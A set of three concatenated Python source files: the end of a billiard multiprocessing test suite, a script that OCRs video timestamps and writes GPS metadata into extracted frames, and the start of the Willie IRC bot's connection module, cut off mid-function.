def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7 + 8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
'''
class _TestPicklingConnections(BaseTestCase):
"""Test of sending connection and socket objects between processes"""
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
billiard.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
'''
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = billiard.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = billiard.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop - start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop - start, 'occupied'))
occupied += stop - start
all.sort()
for i in range(len(all) - 1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i + 1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
@unittest.skipIf(Value is None, "requires ctypes.Value")
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0 / 3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0 / 3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i * 2)
self.assertEqual(string.value, latin('hellohello'))
@unittest.skipIf(Value is None, "requires ctypes.Value")
def test_synchronize(self):
self.test_sharedctypes(lock=True)
@unittest.skipIf(ctypes_copy is None, "requires ctypes.copy")
def test_copy(self):
foo = _Foo(2, 5.0)
bar = ctypes_copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
        # call multiprocessing's cleanup function then exit the process without
        # garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
class _TestImportStar(BaseTestCase):
"""Test that from ... import * works for each module"""
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'billiard', 'billiard.connection',
'billiard.heap', 'billiard.managers',
'billiard.pool', 'billiard.process',
'billiard.reduction',
'billiard.synchronize', 'billiard.util'
]
if c_int is not None:
# This module requires _ctypes
modules.append('billiard.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
class _TestLogging(BaseTestCase):
"""Quick test that logging works -- does not test logging output"""
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = billiard.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = billiard.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = billiard.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = billiard.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == billiard.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'billiard.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _billiard.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _billiard.Connection, -1)
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
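# Illustration (added comment, not part of the original test module):
# create_test_cases() derives concrete TestCase names from the '_Test*'
# templates above, e.g. the '_TestEvent' template combined with the
# 'processes' mixin becomes 'WithProcessesTestEvent', and with the 'threads'
# mixin 'WithThreadsTestEvent', provided the template's ALLOWED_TYPES permits
# that backend.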
class ProcessesMixin(object):
TYPE = 'processes'
Process = billiard.Process
locals().update(get_attributes(billiard, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = billiard.Process
manager = object.__new__(billiard.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = billiard.dummy.Process
locals().update(get_attributes(billiard.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return bytes('something bogus')
def send_bytes(self, data):
pass
self.assertRaises(billiard.AuthenticationError,
billiard.connection.deliver_challenge,
_FakeConnection(), bytes('abc'))
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return billiard.connection.CHALLENGE
elif self.count == 2:
return bytes('something bogus')
return bytes('')
def send_bytes(self, data):
pass
self.assertRaises(billiard.AuthenticationError,
billiard.connection.answer_challenge,
_FakeConnection(), bytes('abc'))
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
"""Test Manager.start()/Pool.__init__() initializer feature
- see issue 5585
"""
def setUp(self):
self.mgr = billiard.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = billiard.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, billiard.Pool, initializer=1)
p = billiard.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
def _ThisSubProcess(q):
try:
q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
"""Issue 5155, 5313, 5331: Test process in processes
Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
"""
queue = billiard.Queue()
subProc = billiard.Process(target=_ThisSubProcess, args=(queue,))
subProc.start()
subProc.join()
def _afunc(x):
return x * x
def pool_in_process():
pool = billiard.Pool(processes=4)
pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = billiard.Queue()
proc = billiard.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = billiard.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = billiard.Process(target=lambda: flike.flush())
self.assertTrue(proc)
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
billiard.RLock()
except OSError:
raise SkipTest("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
billiard.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = billiard.Pool(4)
ThreadsMixin.pool = billiard.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc: tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc: tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc: tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
vtk.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 19 19:50:43 2020
@author: beck
"""
import cv2
import datetime
import dateparser
import os
import sys
import pandas as pd
import pytz
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
from PIL import Image
import numpy as np
import pytesseract
import imutils
import time
from GPSPhoto import gpsphoto
from threading import Thread
def firstFrame(video):
    # Grab the first frame of the video and return it as a PIL image.
    if 'timestamp_frame' not in os.listdir(os.getcwd()):
        os.mkdir('timestamp_frame/')
    video_capture = cv2.VideoCapture(video)
    ret, frame = video_capture.read()
    video_capture.release()
    if not ret:
        raise ValueError('Could not read a frame from ' + video)
    return Image.fromarray(frame.astype('uint8'), 'RGB')
def formatFrame(image, LEFT = 50, TOP = 20, RIGHT = 250, BOTTOM = 90):
image = image.crop((LEFT, TOP, RIGHT, BOTTOM))
image = np.array(image.convert('RGB'))[:, :, ::-1].copy()
image = imutils.resize(image, width=500)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
return thresh
def getCreationDate(filename, config):
if config == 'trident':
pytesseract.pytesseract.tesseract_cmd = 'Tesseract-OCR\\tesseract.exe'
image = formatFrame(firstFrame(filename))
data = pytesseract.image_to_string(image, lang='eng',config='--psm 6')
data_str = str(data).split('\n')
metadata = dateparser.parse(data_str[0]+ ' '+data_str[1])
else:
parser = createParser(filename)
metadata = extractMetadata(parser).get('creation_date')
return metadata
def getOffsets(file):
#GET DELTA SECONDS FOR EVERY FRAME
cap = cv2.VideoCapture(file)
totalframes = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
offsets = [0]
for i in range(totalframes-1):
offsets.append(offsets[-1]+1000/fps)
offsets = [datetime.timedelta(milliseconds=i) for i in offsets]
return offsets
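# A minimal sketch (not in the original script): the cumulative loop above is
# equivalent, up to floating-point accumulation error, to computing each
# frame's offset directly from its index and the frame rate. The function name
# is hypothetical and nothing in this module calls it.
def getOffsetsDirect(file):
    cap = cv2.VideoCapture(file)
    totalframes = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
    fps = int(cap.get(cv2.CAP_PROP_FPS))
    cap.release()
    return [datetime.timedelta(milliseconds=1000.0 * i / fps)
            for i in range(totalframes)]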
def getTimestamps(file, config):
offsets = getOffsets(file)
creationdate = getCreationDate(file, config)
#CALCULATE TIMESTAMPS
timestamps = [(creationdate+offset).replace(tzinfo = pytz.timezone('UTC')) for offset in offsets]
#GENERATE FRAME NAMES
frames = [file.split('/')[-1]+'_'+str(i)+'.jpg' for i in range(len(timestamps))]
    #BUILD FRAME/TIMESTAMP DATAFRAME
df = pd.DataFrame()
df['Frame'] = frames
df['Timestamp'] = timestamps
return df
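# Usage sketch (hypothetical; the file name and output path are examples only):
#   df = getTimestamps('videos/dive_01.mp4', config='trident')
#   df.to_csv('dive_01_timestamps.csv', index=False)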
def getFps(file):
cap = cv2.VideoCapture(file)
return int(cap.get(cv2.CAP_PROP_FPS))
class Writer:
def __init__(self, stream, export_path, taggedDF, parent, controller):
self.taggedDF = taggedDF.reset_index()
self.export_path = export_path
self.taggedList = [self.taggedDF.loc[i,'Frame'] for i in range(len(self.taggedDF['Frame']))]
self.frame_inds = [int(i.split('.')[1].split('_')[1]) for i in self.taggedList]
self.parent = parent
self.controller = controller
self.stream = cv2.VideoCapture(stream)
self.thread = Thread(target=self.write, args=())
self.thread.setDaemon(True)
def write(self):
i = 0
for frame_ind in self.frame_inds:
self.stream.set(cv2.CAP_PROP_POS_FRAMES, frame_ind)
(grabbed, frame) = self.stream.read()
frame_path = self.export_path+self.taggedList[self.frame_inds.index(frame_ind)]
cv2.imwrite(frame_path, frame)
#ADD METADATA
photo = gpsphoto.GPSPhoto(frame_path)
info = gpsphoto.GPSInfo((self.taggedDF.loc[i, 'Latitude'],
self.taggedDF.loc[i, 'Longitude']),
timeStamp=self.taggedDF.loc[i, 'Timestamp'],
alt=int(self.taggedDF.loc[i, 'Elevation']))
photo.modGPSData(info, frame_path)
self.parent.num+=1
i+=1
self.parent.e_status.set('Writing: '+str(self.parent.num)+'/'+str(self.parent.denom))
self.stream.release()
return
def createFrames(path, export_path, taggedDF, parent, controller):
x = len(taggedDF)
a = int(round(x/3))
b = int(a*2)
writer1 = Writer(path, export_path, taggedDF.iloc[:a], parent, controller)
writer2 = Writer(path, export_path, taggedDF.iloc[a:b], parent, controller)
writer3 = Writer(path, export_path, taggedDF.iloc[b:], parent, controller)
writer1.thread.start()
writer2.thread.start()
writer3.thread.start()
writer1.thread.join()
writer2.thread.join()
writer3.thread.join()
parent.e_status.set('Done')
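# A hedged sketch (not part of the original module): createFrames() hard-codes
# three writer threads; the same fan-out can be expressed for an arbitrary
# thread count using the same iloc slicing. The shared parent.num progress
# counter is still incremented from several threads, as in the original.
def createFramesN(path, export_path, taggedDF, parent, controller, n_threads=3):
    size = max(1, int(np.ceil(len(taggedDF) / float(n_threads))))
    chunks = [taggedDF.iloc[i:i + size] for i in range(0, len(taggedDF), size)]
    writers = [Writer(path, export_path, chunk, parent, controller)
               for chunk in chunks]
    for w in writers:
        w.thread.start()
    for w in writers:
        w.thread.join()
    parent.e_status.set('Done')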
|
irc.py
|
# coding=utf8
"""
irc.py - A Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Willie: http://willie.dftba.net/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from willie.tools import stderr, Nick
try:
import select
import ssl
has_ssl = True
except ImportError:
# no SSL support
has_ssl = False
if has_ssl:
if not hasattr(ssl, 'match_hostname'):
# Attempt to import ssl_match_hostname from python-backports
import backports.ssl_match_hostname
ssl.match_hostname = backports.ssl_match_hostname.match_hostname
ssl.CertificateError = backports.ssl_match_hostname.CertificateError
import errno
import threading
from datetime import datetime
if sys.version_info.major >= 3:
unicode = str
class Origin(object):
source = re.compile(r'([^!]*)!?([^@]*)@?(.*)')
def __init__(self, bot, source, args, tags):
self.hostmask = source
self.tags = tags
# Split out the nick, user, and host from hostmask per the regex above.
match = Origin.source.match(source or '')
self.nick, self.user, self.host = match.groups()
self.nick = Nick(self.nick)
# If we have more than one argument, the second one is the sender
if len(args) > 1:
target = Nick(args[1])
else:
target = None
# Unless we're messaging the bot directly, in which case that second
# arg will be our bot's name.
if target and target.lower() == bot.nick.lower():
target = self.nick
self.sender = target
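# Illustration (added comment, not in the original source): for a raw hostmask
# such as 'alice!ident@example.host', the regex above yields nick='alice',
# user='ident', host='example.host'; for a bare server name like
# 'irc.example.net' the nick group captures the whole string and the user and
# host groups are empty.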
class Bot(asynchat.async_chat):
def __init__(self, config):
ca_certs = '/etc/pki/tls/cert.pem'
if config.ca_certs is not None:
ca_certs = config.ca_certs
elif not os.path.isfile(ca_certs):
ca_certs = '/etc/ssl/certs/ca-certificates.crt'
if not os.path.isfile(ca_certs):
stderr('Could not open CA certificates file. SSL will not '
'work properly.')
if config.log_raw is None:
# Default is to log raw data, can be disabled in config
config.log_raw = True
asynchat.async_chat.__init__(self)
self.set_terminator(b'\n')
self.buffer = ''
self.nick = Nick(config.nick)
"""Willie's current ``Nick``. Changing this while Willie is running is
untested."""
self.user = config.user
"""Willie's user/ident."""
self.name = config.name
"""Willie's "real name", as used for whois."""
self.channels = []
"""The list of channels Willie is currently in."""
self.stack = {}
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
# Right now, only accounting for two op levels.
# This might be expanded later.
# These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their voices,
half-ops and ops.
"""
# We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
def log_raw(self, line, prefix):
"""Log raw line to the raw log."""
if not self.config.core.log_raw:
return
if not self.config.core.logdir:
self.config.core.logdir = os.path.join(self.config.dotdir,
'logs')
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception as e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Willie again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
"""Remove newlines from a string."""
if sys.version_info.major >= 3 and isinstance(string, bytes):
string = string.decode('utf8')
elif sys.version_info.major < 3:
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
string = string.replace('\n', '')
string = string.replace('\r', '')
return string
def write(self, args, text=None):
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
        is preceded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``willie.write(('PRIVMSG',), 'Hello, world!')``
and ``willie.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
        sending. Additionally, if the message (after joining) is longer than
        510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
# From RFC2812 Internet Relay Chat: Client Protocol
# Section 2.3
#
# https://tools.ietf.org/html/rfc2812.html
#
# IRC messages are always lines of characters terminated with a
# CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
# NOT exceed 512 characters in length, counting all characters
# including the trailing CR-LF. Thus, there are 510 characters
# maximum allowed for the command and its parameters. There is no
# provision for continuation of message lines.
if text is not None:
temp = (' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = ' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error as e:
stderr('Connection error: %s' % e)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_host else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
            stderr('SSL is not available on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print('KeyboardInterrupt')
self.quit('KeyboardInterrupt')
def quit(self, message):
"""Disconnect from IRC and close the bot."""
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
        # release the main thread, which is problematic because whoever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
# will release the main thread. This should be called last to avoid
# race conditions.
self.close()
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
else:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
try:
ssl.match_hostname(self.ssl.getpeercert(), self.config.host)
except ssl.CertificateError:
stderr("Invalid certficate, hostname mismatch!")
os.unlink(self.config.pid_file_path)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
        # CAP * LS (which we handle in coretasks). Non-IRCv3 servers will
        # respond with 421 Unknown command, which we'll ignore.
self.write(('CAP', 'LS'))
if self.config.core.server_password is not None:
self.write(('PASS', self.config.core.server_password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while self.connected or self.connecting:
if (datetime.now() - self.last_ping_time).seconds > int(self.config.timeout):
stderr('Ping timeout reached after %s seconds, closing connection' % self.config.timeout)
self.handle_close()
break
else:
time.sleep(int(self.config.timeout))
def _send_ping(self):
while self.connected or self.connecting:
if self.connected and (datetime.now() - self.last_ping_time).seconds > int(self.config.timeout) / 2:
try:
self.write(('PING', self.config.host))
except socket.error:
pass
time.sleep(int(self.config.timeout) / 2)
def _ssl_send(self, data):
"""Replacement for self.send() during SSL connections."""
try:
result = self.socket.send(data)
return result
except ssl.SSLError as why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise why
return 0
def _ssl_recv(self, buffer_size):
"""Replacement for self.recv() during SSL connections.
From: http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat
"""
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError as why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
